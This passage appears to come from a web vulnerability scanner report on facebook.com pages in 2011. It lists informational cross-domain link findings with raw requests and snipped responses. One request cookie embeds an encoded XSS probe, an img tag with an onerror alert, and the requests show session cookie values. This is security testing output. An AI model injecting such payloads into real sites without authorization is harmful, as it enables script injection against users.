<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/9czF9X7LzHI.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<div class="promo_image"><img class="Facebook Mobile img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/iYv5KPjJjnb.png" width="435" height="140" /></div>
...[SNIP]...

16.41. http://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/pages/create.php?ref_type=sitefooter
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/y7/r/bQRSWpImyUZ.css
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yU/r/bG937dCt5C4.gif
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/lT0Sbz7GQzD.css
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/8_UVCq8pW91.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /pages/create.php?ref_type=sitefooter HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.33
Connection: close
Date: Thu, 05 May 2011 11:42:03 GMT
Content-Length: 32245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/8_UVCq8pW91.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y7/r/bQRSWpImyUZ.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yt/r/lT0Sbz7GQzD.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<h2 class="uiHeaderTitle"><img class="uiHeaderImage img" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yU/r/bG937dCt5C4.gif" width="15" height="15" />Create a Page</h2>
...[SNIP]...

16.42. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260
The response contains the following links to other domains:
  • http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg
  • http://dy.snimg.com/story-image/1/35/185305/31291-106-85.jpg
  • http://dy.snimg.com/story-image/3/2/185272/31245-106-85.jpg
  • http://dy.snimg.com/story-image/3/21/185097/30983-106-85.jpg
  • http://dy.snimg.com/story-image/3/38/184726/30464-106-85.jpg
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
  • http://www.sportingnews.com/mlb/story/2011-05-03/twins-white-sox-no-hitter
  • http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley
  • http://www.sportingnews.com/ncaa-football/story/2011-04-27/post-spring-top-25-lsu-oklahoma-top-rankings
  • http://www.sportingnews.com/ncaa-football/story/2011-05-02/billboard-off-michigan-highway-takes-aim-at-jim-tressel
  • http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.91.39
X-Cnection: close
Date: Thu, 05 May 2011 01:01:15 GMT
Content-Length: 11989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5eee9bdfd384fc91"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden" title="Rooney responds to Mendenhall&#039;s tweets about bin Laden" target="_top"><img class="img" src="http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden" target="_top">Rooney responds to Mendenhall&#039;s tweets about bin Laden</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_3213f6ceea8333bd"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley" title="Sporting News Executive of the Year: Pat Riley" target="_top"><img class="img" src="http://dy.snimg.com/story-image/1/35/185305/31291-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley" target="_top">Sporting News Executive of the Year: Pat Riley</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_129ad4777ba1fda0"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/ncaa-football/story/2011-05-02/billboard-off-michigan-highway-takes-aim-at-jim-tressel" title="Billboard off Michigan highway takes aim at Jim Tressel" target="_top"><img class="img" src="http://dy.snimg.com/story-image/3/21/185097/30983-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/ncaa-football/story/2011-05-02/billboard-off-michigan-highway-takes-aim-at-jim-tressel" target="_top">Billboard off Michigan highway takes aim at Jim Tressel</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_603ade03dcf9dcac"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/ncaa-football/story/2011-04-27/post-spring-top-25-lsu-oklahoma-top-rankings" title="Post-Spring Top 25: LSU, Oklahoma top rankings" target="_top"><img class="img" src="http://dy.snimg.com/story-image/3/38/184726/30464-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/ncaa-football/story/2011-04-27/post-spring-top-25-lsu-oklahoma-top-rankings" target="_top">Post-Spring Top 25: LSU, Oklahoma top rankings</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_3c7a8cd87fa1cead"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/mlb/story/2011-05-03/twins-white-sox-no-hitter" title="Unlikely ace: Twins&#039; Liriano defies odds, throws season&#039;s first no-hitter" target="_top"><img class="img" src="http://dy.snimg.com/story-image/3/2/185272/31245-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/mlb/story/2011-05-03/twins-white-sox-no-hitter" target="_top">Unlikely ace: Twins&#039; Liriano defies odds, throws season&#039;s first no-hitter</a>
...[SNIP]...
</div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.43. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260
The response contains the following links to other domains:
  • http://ad.doubleclick.net/ad/spn.nba/article;pos=bottom;tile=4;sz=728x90;slug=report-celtics-team-bus-robbed-in-miami-in-april;zone=article;story_sport=nba;ord=949852828?
  • http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg
  • http://dy.snimg.com/story-image/1/35/185305/31291-106-85.jpg
  • http://dy.snimg.com/story-image/2/49/185222/31175-106-85.jpg
  • http://dy.snimg.com/story-image/3/2/185272/31245-106-85.jpg
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
  • http://www.sportingnews.com/mlb/story/2011-05-03/indians-shin-soo-choo-charged-with-dui
  • http://www.sportingnews.com/mlb/story/2011-05-03/twins-white-sox-no-hitter
  • http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley
  • http://www.sportingnews.com/nba/story/2011-05-04/report-celtics-team-bus-robbed-in-miami-in-april
  • http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.33
X-Cnection: close
Date: Thu, 05 May 2011 11:40:14 GMT
Content-Length: 12011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_79163c3f7c97d459"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley" title="Sporting News Executive of the Year: Pat Riley" target="_top"><img class="img" src="http://dy.snimg.com/story-image/1/35/185305/31291-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley" target="_top">Sporting News Executive of the Year: Pat Riley</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_15eb512e45901b75"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden" title="Rooney responds to Mendenhall&#039;s tweets about bin Laden" target="_top"><img class="img" src="http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden" target="_top">Rooney responds to Mendenhall&#039;s tweets about bin Laden</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_8f708edc7c30b2"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/nba/story/2011-05-04/report-celtics-team-bus-robbed-in-miami-in-april" title="Report: Celtics team bus robbed in Miami in April" target="_top"><img class="img" src="http://ad.doubleclick.net/ad/spn.nba/article;pos=bottom;tile=4;sz=728x90;slug=report-celtics-team-bus-robbed-in-miami-in-april;zone=article;story_sport=nba;ord=949852828?" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/nba/story/2011-05-04/report-celtics-team-bus-robbed-in-miami-in-april" target="_top">Report: Celtics team bus robbed in Miami in April</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_777f4629e9b52949"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/mlb/story/2011-05-03/twins-white-sox-no-hitter" title="Unlikely ace: Twins&#039; Liriano defies odds, throws season&#039;s first no-hitter" target="_top"><img class="img" src="http://dy.snimg.com/story-image/3/2/185272/31245-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/mlb/story/2011-05-03/twins-white-sox-no-hitter" target="_top">Unlikely ace: Twins&#039; Liriano defies odds, throws season&#039;s first no-hitter</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_151a721e8727a95b"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/mlb/story/2011-05-03/indians-shin-soo-choo-charged-with-dui" title="Indians&#039; Shin-Soo Choo charged with DUI" target="_top"><img class="img" src="http://dy.snimg.com/story-image/2/49/185222/31175-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/mlb/story/2011-05-03/indians-shin-soo-choo-charged-with-dui" target="_top">Indians&#039; Shin-Soo Choo charged with DUI</a>
...[SNIP]...
</div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.44. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260
The response contains the following links to other domains:
  • http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg
  • http://dy.snimg.com/story-image/1/35/185305/31291-106-85.jpg
  • http://dy.snimg.com/story-image/2/49/185222/31175-106-85.jpg
  • http://dy.snimg.com/story-image/3/21/185097/30983-106-85.jpg
  • http://dy.snimg.com/story-image/3/38/184726/30464-106-85.jpg
  • http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
  • http://www.sportingnews.com/mlb/story/2011-05-03/indians-shin-soo-choo-charged-with-dui
  • http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley
  • http://www.sportingnews.com/ncaa-football/story/2011-04-27/post-spring-top-25-lsu-oklahoma-top-rankings
  • http://www.sportingnews.com/ncaa-football/story/2011-05-02/billboard-off-michigan-highway-takes-aim-at-jim-tressel
  • http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.51.59
X-Cnection: close
Date: Thu, 05 May 2011 00:58:35 GMT
Content-Length: 11937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4bd44a5b29d0576a"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden" title="Rooney responds to Mendenhall&#039;s tweets about bin Laden" target="_top"><img class="img" src="http://dy.snimg.com/story-image/0/26/185199/31162-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/nfl/story/2011-05-03/rooney-responds-to-mendenhalls-tweets-about-bin-laden" target="_top">Rooney responds to Mendenhall&#039;s tweets about bin Laden</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_2729274a10d79846"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley" title="Sporting News Executive of the Year: Pat Riley" target="_top"><img class="img" src="http://dy.snimg.com/story-image/1/35/185305/31291-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/nba/story/2011-05-03/sporting-news-executive-of-the-year-pat-riley" target="_top">Sporting News Executive of the Year: Pat Riley</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7a005f381f5565b"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/ncaa-football/story/2011-05-02/billboard-off-michigan-highway-takes-aim-at-jim-tressel" title="Billboard off Michigan highway takes aim at Jim Tressel" target="_top"><img class="img" src="http://dy.snimg.com/story-image/3/21/185097/30983-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/ncaa-football/story/2011-05-02/billboard-off-michigan-highway-takes-aim-at-jim-tressel" target="_top">Billboard off Michigan highway takes aim at Jim Tressel</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_75000f8726ad7757"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/ncaa-football/story/2011-04-27/post-spring-top-25-lsu-oklahoma-top-rankings" title="Post-Spring Top 25: LSU, Oklahoma top rankings" target="_top"><img class="img" src="http://dy.snimg.com/story-image/3/38/184726/30464-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/ncaa-football/story/2011-04-27/post-spring-top-25-lsu-oklahoma-top-rankings" target="_top">Post-Spring Top 25: LSU, Oklahoma top rankings</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4b25696beb67e544"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.sportingnews.com/mlb/story/2011-05-03/indians-shin-soo-choo-charged-with-dui" title="Indians&#039; Shin-Soo Choo charged with DUI" target="_top"><img class="img" src="http://dy.snimg.com/story-image/2/49/185222/31175-106-85.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.sportingnews.com/mlb/story/2011-05-03/indians-shin-soo-choo-charged-with-dui" target="_top">Indians&#039; Shin-Soo Choo charged with DUI</a>
...[SNIP]...
</div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.45. http://www.facebook.com/plugins/activity.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260
The response contains the following links to other domains:
  • http://ad.doubleclick.net/ad/spn.mlb/article;pos=bottom;tile=4;sz=728x90;slug=high-school-player-makes-incredible-leap-over-catcher-to-avoid-tag-at-home;zone=article;story_sport=mlb;ord=160470471?
